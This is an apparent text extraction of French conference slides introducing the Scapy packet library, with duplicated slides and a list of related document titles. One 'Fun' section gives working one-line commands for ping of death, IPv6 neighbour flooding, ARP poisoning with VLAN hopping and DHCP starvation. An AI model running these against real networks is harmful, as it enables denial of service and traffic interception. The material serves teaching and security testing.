Introduction Présentation de scapy. Scapy. Easy Packet Handling. Etienne Maynier. etienne.maynier@gmail.com. Capitole du Libre 24 Novembre 2012

Similar documents

Python Scripting with Scapy

Hacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail

Why use Scapy? Blue Team. Red Team. Test IDS/IPS Test Firewall Learn more about TCP/IP (down and dirty) Application response(fuzzing)

Packet generation and network based attacks with Scapy

Internet Protocol: IP packet headers. vendredi 18 octobre 13

Scapy. On-the-fly Packet Generation by Dienstag, 10. Januar 12

Network packet forgery with Scapy

Scanning Tools. Scan Types. Network sweeping - Basic technique used to determine which of a range of IP addresses map to live hosts.

Brest. Backup : copy flash:ppe_brest1 running-config

Innominate mguard Version 6

Configure a Microsoft Windows Workstation Internal IP Stateful Firewall

Network Packet Analysis and Scapy Introduction

CSE 127: Computer Security. Network Security. Kirill Levchenko

TP : Configuration de routeurs CISCO

Network layer: Overview. Network layer functions IP Routing and forwarding

Thursday, February 7, DOM via PHP

«Object-Oriented Multi-Methods in Cecil» Craig Chambers (Cours IFT6310, H08)

Firewall implementation and testing

WiNG 5.X How To. Policy Based Routing Cache Redirection. Part No. TME Rev. A

IP addressing and forwarding Network layer

Firewalls N E T W O R K ( A N D D ATA ) S E C U R I T Y / P E D R O B R A N D Ã O M A N U E L E D U A R D O C O R R E I A

IPv6 Workshop: Location Date Security Trainer Name

Networks: IP and TCP. Internet Protocol

Recent advances in IPv6 insecurities Marc van Hauser Heuse Deepsec 2010, Vienna Marc Heuse

Packet filtering with Linux

CSCI Firewalls and Packet Filtering

Lab 2. CS-335a. Fall 2012 Computer Science Department. Manolis Surligas

Durée 4 jours. Pré-requis

Introduction to Analyzer and the ARP protocol

CCT vs. CCENT Skill Set Comparison

A denial of service attack against the Open Floodlight SDN controller

Troubleshooting Tools

Introduction à OpenSSH

Guide to Network Defense and Countermeasures Third Edition. Chapter 2 TCP/IP

Network Traffic Analysis

8.2 The Internet Protocol

+ iptables. packet filtering && firewall

Subnetting,Supernetting, VLSM & CIDR

Internet Firewall CSIS Internet Firewall. Spring 2012 CSIS net13 1. Firewalls. Stateless Packet Filtering

Testing IPv6 Firewalls with ft6

Mise en pratique : installation d'openvpn sur OpenWRT

IPV6 流量分析探讨北京大学计算中心周昌令

TCP/IP Security Problems. History that still teaches

IP(v6) security. Matěj Grégr. Brno University of Technology, Faculty of Information Technology. Slides adapted from Ing.

Understanding and Configuring NAT Tech Note PAN-OS 4.1

CCNP v2 Eğitimi İçeriği

What is a DoS attack?

How to protect your home/office network?

Internetworking. Problem: There is more than one network (heterogeneity & scale)

ModScan A SCADA MODBUS Network Scanner. Mark Bristow mark.bristow@gmail.com

PAN-OS Syslog Integration

Attacking the TCP Reassembly Plane of Network Forensics Tools

LAB II: Securing The Data Path and Routing Infrastructure

IP - The Internet Protocol

CS5008: Internet Computing

netkit lab MPLS VPNs with overlapping address spaces 1.0 S.Filippi, L.Ricci, F.Antonini Version Author(s)

FIREWALLS. Firewall: isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others

Security Technology White Paper

Policy Based Forwarding

Introduction ToIP/Asterisk Quelques applications Trixbox/FOP Autres distributions Conclusion. Asterisk et la ToIP. Projet tuteuré

Host Fingerprinting and Firewalking With hping

Chapter 13 Internet Protocol (IP)

Troubleshooting the Firewall Services Module

Computer Networks 1 (Mạng Máy Tính 1) Lectured by: Dr. Phạm Trần Vũ

Firewalls (IPTABLES)

How To Set Up An Ip Firewall On Linux With Iptables (For Ubuntu) And Iptable (For Windows)

ft6 Motivation next step: perform the tests usually tedious, error prone work aided by a tool easily repeatable enter ft6 ft6

RAPPORT FINANCIER ANNUEL PORTANT SUR LES COMPTES 2014

Tutorial: Options for Blackhole and Discard Routing. Joseph M. Soricelli Wayne Gustavus NANOG 32, Reston, Virginia

Audit de sécurité avec Backtrack 5

Lecture 17 - Network Security

Outline. CSc 466/566. Computer Security. 18 : Network Security Introduction. Network Topology. Network Topology. Christian Collberg

Network Layer: and Multicasting Copyright The McGraw-Hill Companies, Inc. Permission required for reproduction or display.

Firewall Firewall August, 2003

Overview of TCP/IP. TCP/IP and Internet

IPv6 Diagnostic and Troubleshooting

Internet Protocol Version 6 (IPv6)

GregSowell.com. Mikrotik Routing

Dynamic Routing Protocols II OSPF. Distance Vector vs. Link State Routing

Denial of Service Attacks and Countermeasures. Extreme Networks, Inc. All rights reserved. ExtremeXOS Implementing Advanced Security (EIAS)

OfficeScan 10 Enterprise Client Firewall Updated: March 9, 2010

Local Area Networks. LAN Security and local attacks. TDC 363 Winter 2008 John Kristoff - DePaul University 1

tcpdump: network traffic capture

IP network tools & troubleshooting. AFCHIX 2010 Nairobi, Kenya October 2010

IPv6 Security Best Practices. Eric Vyncke Distinguished System Engineer

ACADEMIA LOCAL CISCO UCV-MARACAY CONTENIDO DE CURSO CURRICULUM CCNA. SEGURIDAD SEGURIDAD EN REDES. NIVEL I. VERSION 2.0

Tanenbaum, Computer Networks (extraits) Adaptation par J.Bétréma. DNS The Domain Name System

Archived Content. Contenu archivé

Track 2 Workshop PacNOG 7 American Samoa. Firewalling and NAT

Layer 3 Routing User s Manual

Langages Orientés Objet Java

Network Security. Routing and Firewalls. Radboud University Nijmegen, The Netherlands. Autumn 2014

Command Manual - Network Protocol Quidway S3000 Series Ethernet Switches. Table of Contents

Transcription:

Easy Packet Handling etienne.maynier@gmail.com Capitole du Libre 24 Novembre 2012

Manipulation de paquets : Pour des tests réseau Pour de l éducation Principalement pour des tests de sécurité Développé par Philippe Biondi, chercheur chez EADS Innovation Work Distributé sous GPLv2

Pourquoi?

Pourquoi scapy? (1/2) Des limitations Difficile de faire exactement le paquet que l on veut : Valeur précise de checksum / d id / de padding? Le système peut intervenir (réassemblage, mauvaise version IP...) Peu de protocoles en dehors de TCP/UDP/ICMP Limité à l imagination de l auteur Des interfaces peu intuitives Exemple : hping3 hping3 --icmp 192.168.1.1 --icmp-cksum 0 --icmp-ipid 42 hping3 -S -R 102.168.1.1 -p 80 -s 10000 -M 42 -o 12 -y

Pourquoi scapy? (1/2) Des limitations Difficile de faire exactement le paquet que l on veut : Valeur précise de checksum / d id / de padding? Le système peut intervenir (réassemblage, mauvaise version IP...) Peu de protocoles en dehors de TCP/UDP/ICMP Limité à l imagination de l auteur Des interfaces peu intuitives Exemple : hping3 hping3 --icmp 192.168.1.1 --icmp-cksum 0 --icmp-ipid 42 hping3 -S -R 102.168.1.1 -p 80 -s 10000 -M 42 -o 12 -y

Pourquoi scapy? (2/2) Peu réutilisables Une boite à outil longue et pas combinable. Ex : arpspoof VLAN hopping Impossible de faire du arpspoof via VLAN hopping Décoder / Interpréter Interesting ports on 192.168.9.3: PORT STATE SERVICE 22/tcp filtered ssh Mauvaise interprétation : ICMP Host Unreachable reçu

Pourquoi scapy? (2/2) Peu réutilisables Une boite à outil longue et pas combinable. Ex : arpspoof VLAN hopping Impossible de faire du arpspoof via VLAN hopping Décoder / Interpréter Interesting ports on 192.168.9.3: PORT STATE SERVICE 22/tcp filtered ssh Mauvaise interprétation : ICMP Host Unreachable reçu

Principes Rapide Des valeurs par défaut utiles Intégré dans python Extensible Décode mais n interprète pas Exemple >>> pkt = IP(dst="192.168.1.1") / ICMP() / "Hello World" >>> pkt.summary() IP / ICMP 192.168.1.64 > 192.168.1.1 echo-request 0 / Raw >>> res =sr(pkt) Begin emission:.finished to send 1 packets. * Received 2 packets, got 1 answers, remaining 0 packets >>> res[0].summary() IP / ICMP 192.168.1.64 > 192.168.1.1 echo-request 0 / Raw ==> IP / ICMP 192.168.1.1 > 192.168.1.64 echo-reply 0 / Raw

Principes Rapide Des valeurs par défaut utiles Intégré dans python Extensible Décode mais n interprète pas Exemple >>> pkt = IP(dst="192.168.1.1") / ICMP() / "Hello World" >>> pkt.summary() IP / ICMP 192.168.1.64 > 192.168.1.1 echo-request 0 / Raw >>> res =sr(pkt) Begin emission:.finished to send 1 packets. * Received 2 packets, got 1 answers, remaining 0 packets >>> res[0].summary() IP / ICMP 192.168.1.64 > 192.168.1.1 echo-request 0 / Raw ==> IP / ICMP 192.168.1.1 > 192.168.1.64 echo-reply 0 / Raw

Fonctionnalités Envoi couche 2 & 3 send(ip(dst= 192.168.1.1 ) / ICMP()) sendp(ether(dst= 08 :11 :96 :f6 :42 :12 )/IP(dst= 192.168.1.1 ) / ICMP()) Sniff avancé pkts = sniff(count=10) pkts = sniff(filter="icmp and host 192.168.1.1", count = 2) pkts = sniff(lfilter=lambda(p): p.haslayer(tcp) and p.haslayer(http)) Gestion de pcaps pkts=rdpcap("captures/snmp.cap") wrpcap("temp.cap",pkts) Fuzzing basique pkt = fuzz(ip()) pkt = IP() / fuzz(icmp(type="echo-request")

Fonctionnalités Envoi couche 2 & 3 send(ip(dst= 192.168.1.1 ) / ICMP()) sendp(ether(dst= 08 :11 :96 :f6 :42 :12 )/IP(dst= 192.168.1.1 ) / ICMP()) Sniff avancé pkts = sniff(count=10) pkts = sniff(filter="icmp and host 192.168.1.1", count = 2) pkts = sniff(lfilter=lambda(p): p.haslayer(tcp) and p.haslayer(http)) Gestion de pcaps pkts=rdpcap("captures/snmp.cap") wrpcap("temp.cap",pkts) Fuzzing basique pkt = fuzz(ip()) pkt = IP() / fuzz(icmp(type="echo-request")

Fonctionnalités Envoi couche 2 & 3 send(ip(dst= 192.168.1.1 ) / ICMP()) sendp(ether(dst= 08 :11 :96 :f6 :42 :12 )/IP(dst= 192.168.1.1 ) / ICMP()) Sniff avancé pkts = sniff(count=10) pkts = sniff(filter="icmp and host 192.168.1.1", count = 2) pkts = sniff(lfilter=lambda(p): p.haslayer(tcp) and p.haslayer(http)) Gestion de pcaps pkts=rdpcap("captures/snmp.cap") wrpcap("temp.cap",pkts) Fuzzing basique pkt = fuzz(ip()) pkt = IP() / fuzz(icmp(type="echo-request")

Fonctionnalités Envoi couche 2 & 3 send(ip(dst= 192.168.1.1 ) / ICMP()) sendp(ether(dst= 08 :11 :96 :f6 :42 :12 )/IP(dst= 192.168.1.1 ) / ICMP()) Sniff avancé pkts = sniff(count=10) pkts = sniff(filter="icmp and host 192.168.1.1", count = 2) pkts = sniff(lfilter=lambda(p): p.haslayer(tcp) and p.haslayer(http)) Gestion de pcaps pkts=rdpcap("captures/snmp.cap") wrpcap("temp.cap",pkts) Fuzzing basique pkt = fuzz(ip()) pkt = IP() / fuzz(icmp(type="echo-request")

!

Fun Ping of death send( fragment(ip(dst= 10.0.0.5 )/ICMP()/( X *60000)) ) IPv6 Neighbour Advertisement Flooding send(ipv6(src=randip6()) / ICMPv6ND NA(tgt=RandIP6()) / ICMPv6NDOptDstLLAddr(lladdr=RandMAC()), loop=1) ARP Poisoning sendp(ether(dst=clientmac)/arp(op= who-has, psrc=gateway, pdst=client),inter=randnum(10,40),loop=1) ARP Poisoning with VLAN Hopping sendp(ether(dst=clientmac)/dot1q(vlan=1)/dot1q(vlan=2) /ARP(op= who-has, psrc=gateway, pdst=client), inter=randnum(10,40), loop=1 )

Fun Ping of death send( fragment(ip(dst= 10.0.0.5 )/ICMP()/( X *60000)) ) IPv6 Neighbour Advertisement Flooding send(ipv6(src=randip6()) / ICMPv6ND NA(tgt=RandIP6()) / ICMPv6NDOptDstLLAddr(lladdr=RandMAC()), loop=1) ARP Poisoning sendp(ether(dst=clientmac)/arp(op= who-has, psrc=gateway, pdst=client),inter=randnum(10,40),loop=1) ARP Poisoning with VLAN Hopping sendp(ether(dst=clientmac)/dot1q(vlan=1)/dot1q(vlan=2) /ARP(op= who-has, psrc=gateway, pdst=client), inter=randnum(10,40), loop=1 )

Fun Ping of death send( fragment(ip(dst= 10.0.0.5 )/ICMP()/( X *60000)) ) IPv6 Neighbour Advertisement Flooding send(ipv6(src=randip6()) / ICMPv6ND NA(tgt=RandIP6()) / ICMPv6NDOptDstLLAddr(lladdr=RandMAC()), loop=1) ARP Poisoning sendp(ether(dst=clientmac)/arp(op= who-has, psrc=gateway, pdst=client),inter=randnum(10,40),loop=1) ARP Poisoning with VLAN Hopping sendp(ether(dst=clientmac)/dot1q(vlan=1)/dot1q(vlan=2) /ARP(op= who-has, psrc=gateway, pdst=client), inter=randnum(10,40), loop=1 )

Fun Ping of death send( fragment(ip(dst= 10.0.0.5 )/ICMP()/( X *60000)) ) IPv6 Neighbour Advertisement Flooding send(ipv6(src=randip6()) / ICMPv6ND NA(tgt=RandIP6()) / ICMPv6NDOptDstLLAddr(lladdr=RandMAC()), loop=1) ARP Poisoning sendp(ether(dst=clientmac)/arp(op= who-has, psrc=gateway, pdst=client),inter=randnum(10,40),loop=1) ARP Poisoning with VLAN Hopping sendp(ether(dst=clientmac)/dot1q(vlan=1)/dot1q(vlan=2) /ARP(op= who-has, psrc=gateway, pdst=client), inter=randnum(10,40), loop=1 )

Fun (2/2) DHCP Starvation sendp(ether(src=randmac(),dst="ff:ff:ff:ff:ff:ff")/ip(src="0.0.0.0",dst="255.255.255.255") /UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12, 0123456789abcdef )) /DHCP(options=[("message-type","discover"),"end"])) Scan de protocoles IP res,unans = sr( IP(dst="target", proto=(0,255))/"xx" ) Scan de Protocole IP avec TTL fixe res,unans = sr( IP(dst="target", proto=(0,255), ttl=7)/"xx",retry=-2 )

Fun (2/2) DHCP Starvation sendp(ether(src=randmac(),dst="ff:ff:ff:ff:ff:ff")/ip(src="0.0.0.0",dst="255.255.255.255") /UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12, 0123456789abcdef )) /DHCP(options=[("message-type","discover"),"end"])) Scan de protocoles IP res,unans = sr( IP(dst="target", proto=(0,255))/"xx" ) Scan de Protocole IP avec TTL fixe res,unans = sr( IP(dst="target", proto=(0,255), ttl=7)/"xx",retry=-2 )

Fun (2/2) DHCP Starvation sendp(ether(src=randmac(),dst="ff:ff:ff:ff:ff:ff")/ip(src="0.0.0.0",dst="255.255.255.255") /UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12, 0123456789abcdef )) /DHCP(options=[("message-type","discover"),"end"])) Scan de protocoles IP res,unans = sr( IP(dst="target", proto=(0,255))/"xx" ) Scan de Protocole IP avec TTL fixe res,unans = sr( IP(dst="target", proto=(0,255), ttl=7)/"xx",retry=-2 )

Add-ons Exemple d intégration de scapy dans un script maison 1 #! /usr/bin/env python 2 3 # Set log level to benefit from warnings 4 import logging 5 logging. getlogger( scapy ). setlevel(1) 6 7 from scapy.all import 8 9 class Test(Packet) : 10 name = Test packet 11 fields_desc = [ ShortField( test1, 1), 12 ShortField( test2, 2) ] 13 14 def make_test(x,y) : 15 return Ether()/IP()/Test(test1=x,test2=y) 16 17 if name == main : 18 interact(mydict=globals(), mybanner= Test add on v3.14 )

Implémenter de nouveaux protocoles OSPF 1 class OSPF_Hdr(Packet) : 2 name = OSPF Header 3 fields_desc = [ 4 ByteField( version, 2), 5 ByteEnumField( type, 1, _OSPF_types), 6 ShortField( len, None), 7 IPField( src, 1.1.1.1 ), 8 IPField( area, 0.0.0.0 ), # default : backbone 9 XShortField( chksum, None), 10 ShortEnumField( authtype, 0, {0: Null, 1: Simple, 2: Crypto }), 11 # Null or Simple Authentication 12 ConditionalField(XLongField( authdata, 0), lambda pkt :pkt. authtype!= 2), 13 # Crypto Authentication 14 ConditionalField(XShortField( reserved, 0), lambda pkt :pkt. authtype == 2), 15 ConditionalField(ByteField( keyid, 1), lambda pkt :pkt. authtype == 2), 16 ConditionalField(ByteField( authdatalen, 0), lambda pkt :pkt. authtype == 2), 17 ConditionalField(XIntField( seq, 0), lambda pkt :pkt. authtype == 2), 18 ]

Questions Questions?

Références http://www.secdev.org/projects/scapy/ Doc : http://www.secdev.org/projects/scapy/doc/index.html Bug Tracker : http://trac.secdev.org/scapy/ Network packet forgery with, Philippe Biondi, PacSec 2005 and IPv6 Networking, Philippe Biondi & Arnaud Ebalard, HITB 2006